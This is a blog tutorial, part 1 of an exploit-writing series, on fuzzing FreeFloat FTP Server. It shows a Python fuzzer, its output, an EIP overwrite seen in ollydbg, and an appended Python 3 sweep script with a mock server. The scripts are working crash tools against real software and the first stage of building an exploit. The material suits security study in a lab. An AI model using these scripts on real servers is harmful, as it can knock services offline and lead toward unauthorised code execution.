Guide to Basic Exploit Writing (Part 1- Fuzzing)
Posted on Fx008z | Official Blogger under the labels Buffer Overflow, Exploit Writing, Hacking, Linux and Tutorial.
Hello GreenHackerz Readers.
This is the continuation of the last article, "Buffer Overflow Exploitation". Here we focus on the practical side of exploitation.
So, let's start.
0X01 - What is Fuzzing?
Fuzz testing, or fuzzing, is a software testing technique that discovers coding errors and security holes in software, operating systems or networks by feeding them large amounts of malformed or random data, called fuzz, in an attempt to make them crash or misbehave. When a crash occurs, the fuzzer records the input that caused it so the fault can be reproduced and triaged. Fuzz testing was originally developed by Barton Miller at the University of Wisconsin in 1989.
Fuzzers work best for bugs that make a program crash or hang: buffer overflows, format string bugs and denial-of-service conditions. Input-validation flaws such as SQL injection and cross-site scripting usually do not crash anything, so a fuzzer only finds them when it is given a different oracle (an error string in the response, a marker echoed back) instead of a crash. Attackers use the same technique to find crashes in as little time as possible. Fuzzing is no help at all against threats that are not input-handling bugs, such as spyware, viruses, worms, Trojans and keyloggers.
Fuzz testing is simple and offers a high benefit-to-cost ratio: it often reveals defects that were overlooked when the software was written and debugged. Nevertheless, naive fuzzing usually finds only the most obvious faults, and on its own it cannot give a complete picture of the security, quality or fitness of a program for a particular use. Fuzzers are most effective when used together with extensive black-box testing, beta testing and other proven debugging methods.
================================================
1. Introduction.
A FreeFloat FTP Server buffer overflow exploit for the Metasploit Framework was released on 07/07/2011 on the Exploit Database (www.exploit-db.com/exploits/17498). Its description noted that the exploit works on Win XP SP3 Eng. It was tried on an XP SP3 setup but didn't work, so it was decided to "re-discover" the exploit, since the XP SP3 version had already been done (despite it not working). The same approach can be taken for XP SP2, SP3 and so on. On Win 7 the fuzzing part and the loading of the shellcode worked, but the exploit did not execute; I believe DEP prevents it.
Anyway, I will probably divide this walkthrough into 3 parts. This first part will focus on fuzzing. The second part will probably focus on controlling the EIP and the last on the loading of the shellcode and executing of the exploit. A few points to note:
1. I will try to keep this walkthrough as simple and as "fundamental" as possible, hopefully to help rookies (like me!) get their feet wet in writing exploits. If you prefer more details, there are several good tutorials out there on the web.
2. I will try to avoid the use of Metasploit, specifically the use of msfconsole. That said, I will still use pattern_create, pattern_offset, msfpayload and msfencode, so that we can focus more on the exploit process and less on assembly language, the compiler, the linker, etc.
3. This tutorial is meant for educational purposes only. Test the exploit only on computer networks you own.
================================================
2. Pre-requisite Knowledge.
Here is the pre-requisite knowledge.
1. Some knowledge of Python
2. Some familiarity with ollydbg
3. A little knowledge of the FTP protocol
4. A little knowledge of assembly language e.g. what registers EIP, ESP are, commands like JMP ESP
5. Some knowledge of how the stack works
6. A little knowledge of "little-endian"
7. A little knowledge of Hex values e.g. \x41 --> "A"
8. A little knowledge of opcodes e.g. \x90 --> No Operation (NOP)
9. Familiarity with Linux
You also require two machines, or virtual machines. My set-up is as follows:
Attacker (192.168.1.7): Linux with python2.7 installed
Victim (192.168.1.4): Win Vista Business with Ollydbg 1.10 and FreeFloat FTP Server installed.
Note that you can download the FreeFloat program from the exploit-db link above. Both Ollydbg 1.10 and 2.00 can be used. The same exploit writing process can be applied to other Vista and XP versions as well, although you may need to tweak the code a bit.
================================================
3. Creating a Very Basic Fuzzer.
First, run ollydbg on the Victim's computer. Then open the FreeFloat FTP program from within ollydbg. Press F9 to run the FTP program.
Now, let's build a very basic fuzzer to fuzz the program with varying lengths of "AAAAA..." as our Username.
Code
    #!/usr/bin/python2.7
    # fuzzer.py - An extremely simple fuzzer
    import sys
    import socket
    import time

    target_addr = sys.argv[1]
    target_port = int(sys.argv[2])
    # This is a set literal, so the lengths are tried in arbitrary order (which
    # is why the output in the next section looks shuffled). Use sorted(lengths)
    # if you want an ascending sweep.
    lengths = {127,128,129,255,256,257,511,512,513,1023,1024,1025,2047,2048,2049,4095,4096,4097}

    for length in lengths:
        fuzz = "\x41" * length                                   # a different length of 'A's each loop
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  # create a TCP socket
        sock.settimeout(5)                                       # don't block forever once the server hangs in the debugger
        try:
            sock.connect((target_addr, target_port))
            sock.recv(1024)                                      # receive the Welcome text from the FTP server
            print "Sending", length, "'A's"
            sock.send("USER " + fuzz + "\r\n")                   # send USER AAAAA...
            sock.close()
            print length, "'A's sent\n"
        except socket.error, e:
            print "Connection failed at", length, "'A's:", e, "- the server has probably crashed"
            break
        time.sleep(0.5)
===============================================
4. Running the Fuzzer.
Now, make your fuzzer.py file executable, and run it. You should get something similar to the following:
# ./fuzzer.py 192.168.1.4 21
Sending 4096 'A's
4096 'A's sent
Sending 4097 'A's
4097 'A's sent
Sending 1025 'A's
1025 'A's sent
Sending 2048 'A's
2048 'A's sent
Sending 2049 'A's
2049 'A's sent
Sending 129 'A's
129 'A's sent
Sending 128 'A's
128 'A's sent
Sending 127 'A's
127 'A's sent
Sending 257 'A's
257 'A's sent
The FTP server 'hangs' after 257 'A's have been sent. The figure may differ slightly for you, but it should lie somewhere between roughly 200 and 1000. The lengths went out in shuffled order because `lengths` is a set, which is why the larger values were sent first without any visible effect. More importantly, look at the top-right window of ollydbg, which shows the registers: EIP, which holds the address of the next instruction to be executed, is 41414141, i.e. AAAA. Four bytes from our string of 'A's have overwritten EIP, so there is a chance we can control the execution of the FTP program.
Before moving on to the next part on controlling EIP, tweak the lengths in fuzzer.py to find the approximate maximum length of 'A's that still 'hangs' the FTP program and overwrites EIP with 41414141. On Vista it should be around 1000. You will need to restart the FTP program in ollydbg after each crash: press Ctrl-F2, then F9.
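The length sweep that the text above asks you to do by hand, as an added example in Python 3 (this is not the original post's fuzzer). It tries the lengths in ascending order, checks for a reply after every USER so a crash is detected on the request that caused it rather than on the next connect, and sends one more short probe to confirm the server is really gone. To run offline it talks to a constructed in-process mock FTP server, `MockFtpServer`, whose crash threshold of 257 bytes is an assumption made for the demo and not FreeFloat's value; against the real victim you would call `find_crash_length("192.168.1.4", 21, LENGTHS)` instead.

```python
#!/usr/bin/env python3
# ftp_user_sweep.py - ascending length sweep of the FTP USER command with crash
# detection. Added example; not code from the original post. MockFtpServer is a
# constructed stand-in for the victim so the script runs offline; its CRASH_LEN
# threshold is an assumption for the demo, not FreeFloat's real crash length.
import socket
import threading

CRASH_LEN = 257            # assumed: USER argument length at which the mock "crashes"
LENGTHS = [127, 128, 129, 255, 256, 257, 511, 512, 513, 1023, 1024, 1025,
           2047, 2048, 2049, 4095, 4096, 4097]


def _read_line(conn):
    """Read one CRLF-terminated FTP command (or until EOF)."""
    data = b""
    while b"\r\n" not in data:
        chunk = conn.recv(4096)
        if not chunk:
            break
        data += chunk
    return data.split(b"\r\n")[0]


class MockFtpServer(threading.Thread):
    """Answers USER until an argument of CRASH_LEN bytes or more arrives, then
    sends no reply and stops listening, like a daemon that has just died."""

    def __init__(self, host="127.0.0.1"):
        super().__init__(daemon=True)
        self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.sock.bind((host, 0))               # ephemeral port
        self.sock.listen(5)
        self.port = self.sock.getsockname()[1]
        self.crashed = False

    def run(self):
        while not self.crashed:
            try:
                client, _ = self.sock.accept()
            except OSError:
                return
            with client:
                client.sendall(b"220 mock FTP ready\r\n")
                line = _read_line(client)
                if line.startswith(b"USER ") and len(line) - 5 >= CRASH_LEN:
                    self.crashed = True         # "overflow": no reply, listener closed
                    self.sock.close()
                    return
                client.sendall(b"331 Password required\r\n")


def probe(host, port, length, timeout=3.0):
    """Send USER with `length` 'A's and classify the server's reaction:
    'ok'          greeting received and the command was answered
    'no-response' greeting or reply missing / timed out (crashed, or hung in the debugger)
    'refused'     nothing is listening on the port any more"""
    try:
        with socket.create_connection((host, port), timeout=timeout) as sock:
            if not sock.recv(1024).startswith(b"220"):
                return "no-response"
            sock.sendall(b"USER " + b"A" * length + b"\r\n")
            return "ok" if sock.recv(1024) else "no-response"
    except socket.timeout:
        return "no-response"
    except ConnectionRefusedError:
        return "refused"
    except OSError:                             # e.g. connection reset mid-command
        return "no-response"


def find_crash_length(host, port, lengths):
    """Sweep the lengths in ascending order (unlike iterating a set) and return
    (length, verdict, confirmed) for the first one the server does not survive;
    `confirmed` says whether a fresh short probe also fails. None if all were answered."""
    for length in sorted(set(lengths)):
        verdict = probe(host, port, length)
        if verdict != "ok":
            confirmed = probe(host, port, 1) != "ok"
            return length, verdict, confirmed
    return None


def demo():
    """Run the sweep against the in-process mock; point find_crash_length at the
    real victim (e.g. 192.168.1.4, 21) to use it for real."""
    server = MockFtpServer()
    server.start()
    return find_crash_length("127.0.0.1", server.port, LENGTHS)


if __name__ == "__main__":
    print(demo())                               # (257, 'no-response', True) against the mock
```

Against a server parked at the crash inside ollydbg the kernel still completes the TCP handshake, so the verdict you will see there is 'no-response' (the banner never arrives) rather than 'refused'; both count as "not ok". Restart the server with Ctrl-F2, F9 before each run, and narrow `LENGTHS` around the reported value to find the real boundary.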
I will stop here for now. Part 2, on controlling the EIP, will hopefully be up in the next article.
I hope you have understood something from this article and that it helps you to progress further with exploits. We will learn a lot more as we go on, but it is essential to have a firm understanding of the basic concepts first.
Enjoy the article.
You are reading Guide to Basic Exploit Writing (Part 1- Fuzzing) at https://fx008z.blogspot.com/2012/05/guide-to-basic-exploit-writing-part-1.html